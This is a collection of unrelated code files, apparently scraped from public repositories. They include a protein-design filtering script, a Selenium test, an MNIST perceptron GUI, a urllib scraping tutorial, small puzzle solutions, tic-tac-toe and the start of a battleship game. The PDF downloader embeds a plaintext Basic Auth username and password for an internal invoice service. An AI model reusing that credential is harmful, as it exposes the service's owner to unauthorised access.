def product_plot2D(term1,term2,prod_term,df,percent_list=[0.005,0.01,0.05,0.1,0.25],term1_lower_bound=False,term2_lower_bound=False,topnum=7,general_plot_marker='.',top_plot_marker='d',manual_plot_marker='x'):\n\t'''\n\tA function to make a 2D plot of 2 term product based metrics. Will serve as a blueprint for a 3D version. percent_list should list the percentages of data points (decimal form) that are as good or better than the line. Assumes that higher scores are preferred.\n\tINPUTS:\t\tterm1\t\t\tstr\t\t\tkey for first term in dataframe\n\t\t\t\tterm2\t\t\tstr\t\t\tkey for second term in dataframe\n\t\t\t\tprod_term\t\tstr\t\t\tkey for product in dataframe\n\t\t\t\tdf\t\t\t\tDataFrame\tdataframe of scores\n\t\t\t\tpercent_list\tlist\t\tlist of float values determining dotted lines\n\tRETURNS:\t(fig,ax)\t\t\tpyplot figure and axis objects\n\t'''\n\t# Simple scatter of all the points\n\tfig,ax = plt.subplots(1)\n\tax.set_title(prod_term)\n\tdf.plot.scatter(term1,term2,ax=ax,label='All sequences',marker=general_plot_marker)\n\n\t# rank by the product so each percent cutoff maps to a row index\n\tsorted_df = df.sort_values(prod_term,ignore_index=True, ascending=False)\n\tfor some_cutoff in percent_list:\n\t\tsome_index = int(len(df)*some_cutoff)\n\t\tprod_val = sorted_df.iloc[some_index][prod_term]\n\t\tx = np.linspace(df[term1].min(),df[term1].max(),100)\n\t\tax.plot(x,prod_val/x,'--k')\n\tif term2_lower_bound:\n\t\tax.set_ylim(term2_lower_bound,df[term2].max()*1.05)\n\telse:\n\t\tax.set_ylim(df[term2].min(),df[term2].max()*1.05)\n\tif term1_lower_bound:\n\t\tax.set_xlim(term1_lower_bound,x[-1])\n\tax.spines['top'].set_visible(False)\n\tax.spines['right'].set_visible(False)\n\treturn fig,ax\n\ndef runPostDesign(i):\n\t''' A function to run the hydrophobic design, will eventually turn into a function inside the design class, in here to make sure that it properly coordinates with the multithreading module for now.'''\n\tsuffix = df.iloc[i]['pdbFN'][-12:]\n\trot1 = postDesign(rotamer=df.iloc[i]['Rotamer'], designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\tprint('\\n\\n\\nStarted on rotamer: ',df['pdbFN'][i],'\\n\\n\\n')\n\ndef runPFC_ordered(i):\n\tsuffix = PDB[i][-12:]\n\trot1 = postDesign(rotamer=int(PDB[i][-15:-12]), designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\tprint('\\n\\n\\nStarted on rotamer: ',PDB[i],'\\n\\n\\n')\n\ndef runTestPFC(i,suffix):\n\trot1 = postDesign(rotamer=i, designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC()\n\ndef runRevertMut(i):\n\t''' A function to run the revert-mutation variant of the preform check, kept at module level so it coordinates with the multithreading module.'''\n\tsuffix = df.iloc[i]['pdbFN'][-12:]\n\trot1 = postDesign(rotamer=df.iloc[i]['Rotamer'], designStage='hpDesigned', fileIncre=file_incre, designSuffix=suffix, **xParams)\n\trot1.runPFC(revertMut=True)\n\tprint('\\n\\n\\nStarted on rotamer: ',df['pdbFN'][i],'\\n\\n\\n')\n\n
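# runPreformFilter below gathers every per-rotamer log written during the PFC\n# stage, concatenates them into one DataFrame, applies the xParams thresholds\n# as boolean masks, and writes out the surviving designs plus a summary plot.\n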
def runPreformFilter():\n\n\t# make directory for the result file\n\ttry:\n\t\tos.mkdir('../'+xParams['PDBID']+'/passedPFC')\n\t\tos.mkdir('../'+xParams['PDBID']+'/passedPFC/result_plots')\n\t\tprint('Folder created\\n\\n')\n\texcept:\n\t\tprint('Folder exists\\n\\n')\n\n\tpass_log_folder = '../'+xParams['PDBID']+'/passedPFC/'\n\n\t# Set paths for log files and result file\n\tlogFolder = '../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/PFCheck/logs/*'\n\tsaveFN = pass_log_folder+xParams['PDBID']+'_CLUSTERX_'+file_incre+'_passedPFC.txt'\n\n\t# Make a glob that has all the log files\n\tlogFiles = glob(logFolder)\n\n\t# Initialize a dataframe to hold all the information\n\tdf = pd.DataFrame(columns=['pdbFN_CUT','pdbFN_MIN','total_ETE_score','initial_score',\n\t\t\t\t\t\t\t   'bound(minimized)','cut_score','rlx_test_score','translated(trans-preMin)',\n\t\t\t\t\t\t\t   'unbound(trans-Min)','numHB','total_hEn','SASA','SC','Bunsat','fa_rep','intra',\n\t\t\t\t\t\t\t   'fa_atr','IE1_2','IE1_3','RMSD_BS','RMSD_ETE','Rotamer','clusterCenter','FASTA'])\n\t\n\tfor fn in logFiles:\n\t\tlogDF = pd.read_csv(fn,delimiter='\\t')\n\t\tdf = df.append(logDF,ignore_index=True)\n\n\t'''\n\t# Currently just manually put in some cutoffs\n\tclashMax = 15\n\tatrMax = -15\n\tintra_Max = 20\n\tbound_hdx_Min = 3\n\tstg_hb_Min = 1\n\thdx_hbNo_Min = 3\n\tper_hdx_hEnMax = -0.9\n\tSASA_Max = 8\n\trmsd_Max = 1\n\tIE_Max = 10\n\tSC_Min = 0.6\n\t'''\n\n\t# Set filter and output to a file\n\tdf.reset_index(inplace=True,drop=True)\n\tboundhdxFilter = df['numHB'] >= xParams['hbCountMin']\n\ttotalHBEnFilter = df['total_hEn'] <= xParams['hbEnMax']\n\tclsFilter = df['fa_rep'] <= xParams['clashMax']\n\tatrFilter = df['fa_atr'] <= xParams['atrMax']\n\tintraFilter = df['intra'] <= xParams['intraMax']\n\tSASAFilter = df['SASA'] <= xParams['SASA_Max']\n\tSCfilter = df['SC'] >= xParams['SC_Min']\n\t#hdx_NoFilter = df['hdx_hbNo'] >= hdx_hbNo_Min\n\t#G_EnFilter = df['G_hEn'] <= per_hdx_hEnMax\n\t#D_EnFilter = df['D_hEn'] <= per_hdx_hEnMax\n\t#E_EnFilter = df['E_hEn'] <= per_hdx_hEnMax\n\t#IE1_2Filter = df['IE1_2'] <= IE_Max\n\t#IE1_3Filter = df['IE1_3'] <= IE_Max\n\t#rmsdBSFilter = df['RMSD_BS'] <= rmsd_Max\n\t#rmsdETEFilter = df['RMSD_ETE'] <= rmsd_Max\n\t\n\n\n\tcombinedFilter = boundhdxFilter & totalHBEnFilter & clsFilter & atrFilter & intraFilter & SASAFilter & SCfilter\n\t#& G_EnFilter & D_EnFilter & E_EnFilter & IE1_2Filter & IE1_3Filter & hdx_NoFilter & rmsdBSFilter & rmsdETEFilter\n\n\tgood_PFC = df[combinedFilter]\n\t#good_PFC = good_PFC.sort_values(by=['IE1_3'],ascending=True)\n\tgood_PFC.reset_index(inplace=True)\n\tprint('\\nPreformation check has completed!!!!\\n\\n', len(good_PFC),'structures passed PFC!!!!')\n\tprint('\\nInitiating analysis and plotting processes....')\n\tdesignCode = file_incre.lstrip('0')\n\n\tgood_PFC['short_name'] = [get_shorter_name(somepdb,designCode,False) for somepdb in good_PFC['pdbFN_CUT']]\n\tgood_PFC['hb*SC'] = good_PFC['total_hEn']*good_PFC['SC']\n\n\ttop10 = print_top(good_PFC, sort_by_column='hb*SC', ascending=False)\n\n\tprint('Top 10 structures are:\\n',top10)\n\n\tgood_PFC.to_csv(saveFN,sep='\\t',index=False)\n\n\tplot_fig,plot_ax = product_plot2D('SC','total_hEn','hb*SC',good_PFC)\n\tplot_fig.savefig('../'+xParams['PDBID']+'/passedPFC/result_plots/'+xParams['PDBID']+'_'+file_incre+'_HB&SC_Product.png',dpi=300)\n\tprint('\\nAnalysis and plotting are completed!!!!')\n\n\t# Initiate the process that pulls the candidates to a folder\n\ttry:\n\t\tos.mkdir('../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/top10/')\n\texcept:\n\t\tprint('Folder exists')\n\n\ttop10folder = '../'+xParams['PDBID']+'/CLUSTERX_'+file_incre+'/top10/'\n\n\tfor i in range(0,10):\n\t\tshutil.copyfile(good_PFC['short_name'][i], top10folder+good_PFC['short_name'][i])\n\tprint('\\nThe top 10 structures are copied into:',top10folder)\n\n#------------------------------------------------------------------------------------------------------------------\n\nmyPool = Pool(processes=30)\n\nif stage == 'pfc':\n\t# Initiate multithreading for preformCheck\n\tfor i in myPool.imap_unordered(runPostDesign,range(len(df))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\nelif stage == 'rm':\n\t# Initiate multithreading for 
RevertMut\n\tfor i in myPool.imap_unordered(runRevertMut,range(len(df))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\nelif stage == 'ordered':\n\t# Initiate multithreading for PFC for the ordered structrues\n\tfor i in myPool.imap_unordered(runPFC_ordered,range(len(PDB))):\n\t\tprint('initiating preform check\\n\\n\\n')\n\tprint('\\nPFC completed, initiating filter....')\n\trunPreformFilter()\n\n# For single test run \nelif stage == 'test':\n\tsuffix = '_C_02_01.pdb'\n\trunTestPFC(362,suffix)\n\n\nend = time()\n\nd = end - start\n\nif d >= 3600:\n\tprint('\\nTotal run time was', d/3600, 'hr')\nif 60 <= d < 3600:\n\tprint('\\nTotal run time was', d/60, 'min')\nif d < 60:\n\tprint('\\nTotal run time was', d, 'sec')","repo_name":"yijietseng/Radical_EnzDes_scripts","sub_path":"PFCDrive.py","file_name":"PFCDrive.py","file_ext":"py","file_size_in_byte":10372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"25472581689","text":"import time\nfrom pages.download_upload_page import *\nfrom pages.row_page import *\nfrom pages.checkboxes_page import *\nfrom pages.doubleClick_page import *\nfrom pages.alerts_page import *\nimport unittest\n\n\nclass Alerts(unittest.TestCase):\n def test_alerts(self):\n url = \"https://demoqa.com/alerts\"\n alert_func = AlertsMethods(url)\n alert_func.click(first_btn_id)\n alert_func.accept_wait_alerts()\n alert_func.click(second_btn_id)\n alert_func.waiting(get_result_text)\n alert_func.accept_wait_alerts()\n alert_func.click(third_btn_id)\n alert_func.dismiss_wait_alerts()\n text = alert_func.get_text(get_result_text)\n print(text)\n self.assertEqual(third_btn_expected_result, text,\n \"Clicked Text Not Matched - Failed\")\n alert_func.click(forth_btn_id)\n alert_func.promt_wait_alerts(prompt_input_value)\n text = alert_func.get_text(prompt_result_text_id)\n clean_text = alert_func.clean_text(text, prompt_input_value)\n print(clean_text)\n self.assertEqual(clean_text, prompt_input_value,\n \"Text Not Match - Failed\")\n alert_func.tearDown()\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"salmanahmad21/Automation_Training","sub_path":"Training_POM/tests/alerts_test.py","file_name":"alerts_test.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"37673803083","text":"from struct import unpack\nfrom PIL import Image\nfrom PIL import ImageOps\nfrom PyQt5.QtGui import QGuiApplication, QImage\nfrom PyQt5.QtQml import QQmlApplicationEngine, qmlRegisterType\nfrom PyQt5.QtCore import *\n\nimport sys\nimport numpy as np\nfrom PyQt5.QtQuick import QQuickPaintedItem\n\n\ndef read_idx1(file):\n with open(file, 'rb') as f:\n magic, length = unpack('>ii', f.read(8))\n if magic != 2049:\n raise RuntimeError('wrong file format')\n return np.fromfile(f, np.uint8, length).astype(np.int64)\n\n\ndef read_idx3(file):\n data = []\n with open(file, 'rb') as f:\n magic, length = unpack('>ii', f.read(8))\n if magic != 2051:\n raise RuntimeError('wrong file format')\n rows, columns = unpack('>ii', f.read(8))\n for i in range(length):\n img = np.fromfile(f, np.uint8, rows * columns).astype(np.float)\n img = img / 255\n data.append(img)\n return np.array(data)\n\n\ndef resize_image(data):\n img = Image.new('L', (28, 28))\n img.putdata(data)\n img = img.resize((12, 12), Image.ANTIALIAS)\n return np.array(img.getdata())\n\n\ndef 
create_dumb_network(input_count, hidden_count, output_count):\n scale = 1.0 / input_count ** (1 / 2)\n input2hidden = np.random.normal(0, scale, (input_count, hidden_count))\n hidden2output = np.random.uniform(size=(hidden_count, output_count)) / np.sqrt(hidden_count)\n delta0 = np.zeros((input_count, hidden_count)).astype(np.float)\n delta1 = np.zeros((hidden_count, output_count)).astype(np.float)\n return [input2hidden, hidden2output, delta0, delta1]\n\n\ndef sigmoid(x):\n return 1 / (1 + np.exp(-x))\n\n\ndef tanh(x):\n return np.tanh(x)\n\n\ndef get_output(network, input):\n hidden_layer = tanh(np.dot(network[0].T, input))\n output_layer = sigmoid(np.dot(network[1].T, hidden_layer))\n return hidden_layer, output_layer\n\n\ndef correct_weights(network, input, output_layers, expected):\n hidden, output = output_layers\n # print(hidden)\n # print('output ', output)\n # print('expected', expected)\n delta_output = output * (1 - output) * (expected - output)\n\n error = np.dot(network[1], delta_output)\n delta_hidden = (1 - error * error) * error\n\n # network[3] = delta_output * np.reshape(output_layers[0], (output_layers[0].shape[0], 1))\n # network[2] = delta_hidden * np.reshape(input, (input.shape[0], 1))\n network[3] = delta_output * np.reshape(output_layers[0], (output_layers[0].shape[0], 1))\n network[2] = delta_hidden * np.reshape(input, (input.shape[0], 1))\n eta = 0.01\n network[0] += eta * network[2]\n network[1] += eta * network[3]\n # print(network)\n\n\ndef train_step(network, label, data):\n output = get_output(network, data)\n expected = np.array([1 if k == label else 0 for k in range(len(network[1][0]))]).astype(np.float)\n correct_weights(network, data, output, expected)\n return output[1], expected\n\n\ndef train_generation(network, train_labels, train_data):\n for idx, label in enumerate(train_labels):\n print('step:', idx)\n train_step(network, label, train_data[idx])\n\n\ndef train(network, train_labels, train_data):\n for i in range(1):\n # print('generation:', i)\n train_generation(network, train_labels, train_data)\n\n\ndef test(network, test_labels, test_data):\n for idx, label in enumerate(test_labels):\n test_step(network, label, test_data[idx])\n\n\ndef test_step(network, label, data):\n output = get_output(network, data)\n expected = np.array([1 if k == label else 0 for k in range(len(network[1][0]))]).astype(np.float)\n return output[1], expected\n\n\ndef data2image(data):\n data = data * 255\n data = data.astype(np.uint8)\n img = Image.new('L', (12, 12))\n img.putdata(data)\n img = ImageOps.invert(img)\n return img\n\n\nclass TrainGui(QObject):\n def __init__(self, parent=None):\n QObject.__init__(self, parent=parent)\n self.train_data = read_idx3('mnist/train.idx3-ubyte')\n self.train_labels = read_idx1('mnist/train.idx1-ubyte')\n self.network = create_dumb_network(28 * 28, 100, 10)\n self._index = -1\n self._paused = True\n self._timer = QTimer(parent=self)\n self._timer.timeout.connect(self.nextStep)\n self.nextStep()\n\n indexChanged = pyqtSignal()\n\n @pyqtProperty('int', notify=indexChanged)\n def index(self):\n return self._index\n\n pausedChanged = pyqtSignal()\n\n @pyqtProperty('bool', notify=pausedChanged)\n def paused(self):\n return self._paused\n\n @paused.setter\n def paused(self, spaused):\n self._paused = spaused\n if self._paused:\n self._timer.stop()\n else:\n self._timer.start()\n self.pausedChanged.emit()\n\n resultChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=resultChanged)\n def result(self):\n return self._result\n\n 
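# Each pyqtProperty below is paired with a *Changed notify signal; emitting\n    # the signal is what makes QML bindings re-read the property.\n    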
expectedChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=expectedChanged)\n def expected(self):\n return self._expected\n\n imageChanged = pyqtSignal()\n\n @pyqtProperty('QImage', notify=imageChanged)\n def image(self):\n data = self.train_data[self._index]\n data *= 255\n img = QImage(data.astype(np.uint8), 28, 28, QImage.Format_Grayscale8)\n img.invertPixels()\n return img\n\n @pyqtSlot()\n def nextStep(self):\n self._index += 1\n if self._index >= len(self.train_labels):\n self._index -= 1\n self.paused = True\n return\n self._result, self._expected = train_step(self.network,\n self.train_labels[self._index],\n self.train_data[self._index])\n frm = {'float_kind': lambda x: \"{0:.4f}\".format(x)}\n self._result = np.array2string(self._result, formatter=frm)\n self._expected = np.array2string(self._expected, formatter=frm)\n self.resultChanged.emit()\n self.expectedChanged.emit()\n self.indexChanged.emit()\n self.imageChanged.emit()\n\n\nclass TestGui(QObject):\n def __init__(self, network, parent=None):\n QObject.__init__(self, parent=parent)\n self.test_data = read_idx3('mnist/test.idx3-ubyte')\n self.test_labels = read_idx1('mnist/test.idx1-ubyte')\n self.network = network\n self._index = -1\n self._paused = True\n self._classified_right = 0\n self._timer = QTimer(parent=self)\n self._timer.timeout.connect(self.nextStep)\n self._expectednum = 0\n self._resultnum = 0\n self._result = ''\n self._expected = ''\n # self.nextStep()\n\n indexChanged = pyqtSignal()\n\n @pyqtProperty('int', notify=indexChanged)\n def index(self):\n return self._index\n\n pausedChanged = pyqtSignal()\n\n @pyqtProperty('bool', notify=pausedChanged)\n def paused(self):\n return self._paused\n\n @paused.setter\n def paused(self, spaused):\n self._paused = spaused\n if self._paused:\n self._timer.stop()\n else:\n self._timer.start()\n self.pausedChanged.emit()\n\n resultChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=resultChanged)\n def result(self):\n return self._result\n\n expectedChanged = pyqtSignal()\n\n @pyqtProperty('QString', notify=expectedChanged)\n def expected(self):\n return self._expected\n\n @pyqtProperty('int', notify=resultChanged)\n def resultnum(self):\n return self._resultnum\n\n @pyqtProperty('int', notify=expectedChanged)\n def expectednum(self):\n return self._expectednum\n\n imageChanged = pyqtSignal()\n\n @pyqtProperty('QImage', notify=imageChanged)\n def image(self):\n if self._index < 0:\n return QImage()\n data = self.test_data[self._index]\n data *= 255\n img = QImage(data.astype(np.uint8), 28, 28, QImage.Format_Grayscale8)\n img.invertPixels()\n return img\n\n @pyqtSlot()\n def nextStep(self):\n self._index += 1\n if self._index >= len(self.test_labels):\n self._index -= 1\n self.paused = True\n return\n self._result, self._expected = test_step(self.network,\n self.test_labels[self._index],\n self.test_data[self._index])\n frm = {'float_kind': lambda x: \"{0:.4f}\".format(x)}\n self._expectednum = np.argmax(self._expected)\n self._resultnum = np.argmax(self._result)\n self._result = np.array2string(self._result, formatter=frm)\n self._expected = np.array2string(self._expected, formatter=frm)\n if self._expectednum != self._resultnum:\n # self.paused = True\n print(self._classified_right / (self.index + 1))\n else:\n self._classified_right += 1\n self.resultChanged.emit()\n self.expectedChanged.emit()\n self.indexChanged.emit()\n self.imageChanged.emit()\n\n @pyqtSlot()\n def prevStep(self):\n self._index -= 1\n if self._index < 0:\n self._index += 1\n 
self.indexChanged.emit()\n        self.imageChanged.emit()\n\nclass QImagePainter(QQuickPaintedItem):\n    def __init__(self, parent=None):\n        QQuickPaintedItem.__init__(self, parent=parent)\n        self._image = QImage(28, 28, QImage.Format_Grayscale8)\n\n    imageChanged = pyqtSignal()\n\n    @pyqtProperty('QImage', notify=imageChanged)\n    def image(self):\n        return self._image\n\n    @image.setter\n    def image(self, simage):\n        self._image = simage\n        self.imageChanged.emit()\n        self.update()\n\n    def paint(self, painter):\n        painter.drawImage(QPoint(0, 0), self._image.scaled(self.width(), self.height()))\n\n\nif __name__ == '__main__':\n    # train_data = read_idx3('mnist/train.idx3-ubyte')\n    # train_labels = read_idx1('mnist/train.idx1-ubyte')\n    #\n    # test_data = read_idx3('mnist/test.idx3-ubyte')\n    # test_labels = read_idx1('mnist/test.idx1-ubyte')\n    #\n    # network = create_dumb_network(28 * 28, 100, 10)\n    #\n    # train(network, train_labels, train_data)\n    # print('===== TEST =====')\n    # test(network, test_labels, test_data)\n    app = QGuiApplication(sys.argv)\n    engine = QQmlApplicationEngine(parent=app)\n    ctx = engine.rootContext()\n    trainGui = TrainGui()\n    ctx.setContextProperty(\"trainGui\", trainGui)\n    testGui = TestGui(trainGui.network)\n    ctx.setContextProperty(\"testGui\", testGui)\n    qmlRegisterType(QImagePainter, \"PerceptronImagePainter\", 1, 0, \"ImagePainter\")\n    engine.load(QUrl(\"gui/main.qml\"))\n    exit(app.exec_())\n","repo_name":"gaudima/machine-learning","sub_path":"Lab6 - Perceptron/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":10703,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"22940772615","text":"import os\nimport requests\nfrom requests.auth import HTTPBasicAuth\n\n\ndef download_pdf_file(url: str) -> bool:\n    \"\"\"Download PDF from given URL to local directory.\n\n    :param url: The url of the PDF file to be downloaded\n    :return: True if PDF file was successfully downloaded, otherwise False.\n    \"\"\"\n\n    # Request URL and get response object\n    basic = HTTPBasicAuth('OMNI', 'uC#3%6UOc0q%C$mBMilN6GB72Lr30$DV')\n    response = requests.get(url, stream=True, auth=basic)\n\n
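    # Note: even with stream=True, reading response.content below pulls the\n    # whole body into memory; response.iter_content() would be needed to\n    # stream a large file chunk by chunk.\n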
    # isolate PDF filename from URL\n    pdf_file_name = os.path.basename(url)\n    if response.status_code == 200:\n        # Save in current working directory\n        filepath = os.path.join(os.getcwd(), pdf_file_name)\n        with open(filepath, 'wb') as pdf_object:\n            pdf_object.write(response.content)\n        print(f'{pdf_file_name} was successfully saved!')\n        return True\n    else:\n        print(f'Uh oh! Could not download {pdb_file_name},')\n        print(f'HTTP response status code: {response.status_code}')\n        return False\n\n\nif __name__ == '__main__':\n    # URL from which pdfs to be downloaded\n    URL = 'https://invoice-service.dgl-dev.tekoapis.net/invoice-service/service/download?orderId=230405120978260_SBN01&taxIdentify=OMNI_SELLER_SB'\n    download_pdf_file(URL)","repo_name":"vrdong/leetcode_challenge","sub_path":"dowload_pdf/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"}
{"seq_id":"41821662118","text":"\"\"\"\nDate: 2022/04/17\n\"\"\"\nimport urllib.request as ur\nfrom configparser import ConfigParser\nimport urllib.parse as uparse\n\nconfig = ConfigParser()\nconfig.read(\"./urls.ini\")\nurl = config.get(\"url\",\"baidu\")\n\n# fetch page information\ndef get_full(url):\n    response = ur.urlopen(url)\n    print(type(response))#HTTPResponse\n    print(response.getcode())#status code\n    print(response.getheaders())#get the headers\n    print(response.geturl())#get the url\n    # content is of type bytes\n    content = response.readline()#read one line\n    print(content)\n    content = response.read(20)#read 20 bytes\n    print(content)\n    content = response.readlines()#return a list containing all the lines\n    # print(content)\n    content = response.read().decode('utf-8')#fetch the whole page by default\n\n# get_full(url)\n\n# download\ndef download_from_url(url,filename):\n    # the first argument is the url, the second is where to save the file\n    ur.urlretrieve(url,filename)\n\n# download_from_url(url,\"./files/texts/baidu.html\")\n\nheader1 = {'User-Agent':\n'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36'}\n# build a customized request object\ndef custom_request(url,header):\n    request = ur.Request(url=url,headers=header)\n    response = ur.urlopen(request)\n    content = response.read().decode('utf-8')\n    print(content)\n'https://www.baidu.com/s?ie=UTF-8&wd=%E5%91%A8%E6%9D%B0%E4%BC%A6'\n# convert the string to its percent-encoded (URL) form\n# custom_request(config.get(\"url\",\"jaychou\")+uparse.quote(\"周杰伦\"),header1)\n\npara = {'wd':'周杰伦','sex':\"男\"}# urlencode turns this into the form wd=%E5%91%A8%E6%9D%B0%E4%BC%A6&sex=%E7%94%B7\n# turn a dict into the query string of a GET request\ndef construct_get_para(baseurl,para,header):\n    entire_path = baseurl + uparse.urlencode(para)\n    print(\"完整的请求路径是:{}\".format(entire_path))\n    request = ur.Request(url=entire_path, headers=header)\n    response = ur.urlopen(request)\n    content = response.read().decode('utf-8')\n    print(content)\nconstruct_get_para(\"https://www.baidu.com/s?ie=UTF-8&\",para,header1)\n","repo_name":"TrellixVulnTeam/CodeCenter_4ZN7","sub_path":"爬虫/urllib的get请求的使用.py","file_name":"urllib的get请求的使用.py","file_ext":"py","file_size_in_byte":2046,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"29983760107","text":"\ndef currently_winning(scores):\n    yc = [scores[0]]\n    oc = [scores[1]]\n    for i in range(2, len(scores)):\n        if i % 2 == 0:\n            yc.append(scores[i] + yc[-1])\n        else:\n            oc.append(scores[i] + oc[-1])\n    x = []\n    for i in range(len(yc)):\n        if yc[i] == oc[i]:\n            x.append('T')\n        elif yc[i] > oc[i]:\n            x.append('Y')\n        else:\n            x.append('O')\n    return x\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"epMcaSNzBFSF5uB89_9.py","file_name":"epMcaSNzBFSF5uB89_9.py","file_ext":"py","file_size_in_byte":370,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"74170116571","text":"from collections import Counter\r\n\r\nN = int(input())\r\nplayer = []\r\nresult = []\r\ncnt = 0\r\n\r\nfor i in range(N):\r\n    name = input()\r\n    player.append(name[0]) # only the first letter is needed\r\n\r\n
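# Counter builds a letter -> count map in a single pass, so no manual\r\n# dictionary bookkeeping is needed before the >= 5 check below.\r\n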
# count the first letters with Counter\r\nplayer_count = Counter(player)\r\n\r\nfor i, j in player_count.items():\r\n    if j >= 5:\r\n        result.append(i)\r\n        cnt += 1\r\n\r\nresult.sort()\r\n\r\nif cnt == 0:\r\n    print('PREDAJA')\r\nelse:\r\n    for i in result:\r\n        print(i, end='')\r\n","repo_name":"JangGiWon/Beakjoon","sub_path":"1159.py","file_name":"1159.py","file_ext":"py","file_size_in_byte":472,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"6542502931","text":"#! /usr/bin/env\nfrom __future__ import print_function\nprint('Tic-Tac-Toe\\n\\n')\nprevMoves = []\n# The board is composed of lists\nboard = [[' ','|',' ','|',' '],['-','+','-','+','-'],[' ','|',' ','|',' '],['-','+','-','+','-'],[' ','|',' ','|',' ']]\n\n
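# Only the even row/column indices (0, 2, 4) are playable cells; the odd\n# indices hold the grid separators, which is why getEntry() maps the 1-3\n# input onto 0, 2 and 4 below.\n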
\ndef printBoard():\n    for i in board:\n        for x in i:\n            print(x,end=\"\") # I print the board every attempted turn\n        print()\n\ndef getPlayer():\n    if len(prevMoves)%2 == 0: # This ensures the first player is 'x', and that it swaps every successful turn\n        player = 'x'\n    else:\n        player = 'o'\n    return player\n\ndef getEntry(): # Gets the user's entry and writes it to the board\n    player = getPlayer()\n\n    row = 0 # These two while statements take only an int input\n    while row < 1 or row > 3:\n        row = int(input('Row(1-3): '))\n    print()\n    column = 0\n    while column < 1 or column > 3:\n        column = int(input('Column(1-3): '))\n\n    # Convert the 1-3 input into the corresponding board indexes\n    if row == 1:\n        row = 0\n    elif row == 2:\n        row = 2\n    elif row == 3:\n        row = 4\n\n    if column == 1:\n        column = 0\n    elif column == 2:\n        column = 2\n    elif column == 3:\n        column = 4 \n    # The rest of the function determines whether the chosen spot has been taken yet, and prints if so\n    taken = False\n    i = 0\n    while taken == False and i < len(prevMoves): # Exits once the spot is found to be taken,\n                                                 # or the index has exceeded the list\n        if prevMoves[i] == [row,column]:\n            print('That spot is already taken. Please try again')\n            taken = True\n        i += 1\n    # If the spot is available, the player will be written to the board, and the move will be logged\n    if taken == False:\n        prevMoves.append([row,column])\n        board[row][column] = player\n    # Hello there\n    print()\n\n\ndef getWinner():\n    # Determines the winner or lack thereof\n    player = getPlayer()\n    if player == 'x':\n        player = 'o'\n    else:\n        player = 'x'\n    if board[0][0] == player and board[0][2] == player and board[0][4] == player:\n        return player\n    elif board[2][0] == player and board[2][2] == player and board[2][4] == player:\n        return player\n    elif board[4][0] == player and board[4][2] == player and board[4][4] == player:\n        return player\n    elif board[0][0] == player and board[2][0] == player and board[4][0] == player:\n        return player\n    elif board[0][2] == player and board[2][2] == player and board[4][2] == player:\n        return player\n    elif board[0][4] == player and board[2][4] == player and board[4][4] == player:\n        return player\n    elif board[0][0] == player and board[2][2] == player and board[4][4] == player:\n        return player\n    elif board[4][0] == player and board[2][2] == player and board[0][4] == player:\n        return player\n    \n    print()\n    return 'nobody'\n\n\ndef main():\n    i = -1\n    while getWinner() == 'nobody' and len(prevMoves) < 9:\n        #player = getPlayer()\n        i += 1\n        printBoard()\n        getEntry()\n        getWinner()\n\n    printBoard()\n    print(getWinner(),'wins!')\n    input('ENTER to exit: ')\n\nif __name__ == '__main__':\n    main()\n","repo_name":"oliviasolis/portfolio","sub_path":"tic-tac-toe.py","file_name":"tic-tac-toe.py","file_ext":"py","file_size_in_byte":3264,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
{"seq_id":"19284704752","text":"from server.Ship import *\nfrom random import randrange, choice\n\n\n# class describing a player and his behaviour\nclass Player:\n    def __init__(self):\n        self.ships = [] # the player's fleet\n        self.fleet_coord = [] # coordinates of the player's fleet\n        self.battlefield = [[0 for _ in range(10)] for _ in range(10)] # the player's board (0 - empty cell)\n        self.shoots = [] # list of coordinates of shots already fired\n        self.ships_create() # build the fleet\n\n    def __str__(self):\n        return f'{self.ships} {self.battlefield} {self.fleet_coord}'\n\n    # method that updates the player's board:\n    # marks the points from coord_list with the given\n    # status (1 - intact point, 2 - damaged point\\sunk ship, points around a ship)\n    def battlefield_change(self, coord_list, status):\n        for coord in coord_list:\n            battlefield_row, battlefield_column = coord\n            self.battlefield[battlefield_row][battlefield_column] = status\n\n
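    # Cell markers used throughout: 0 - empty, 1 - intact ship deck,\n    # 2 - miss or the buffer zone around a sunk ship, 3 - hit deck.\n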
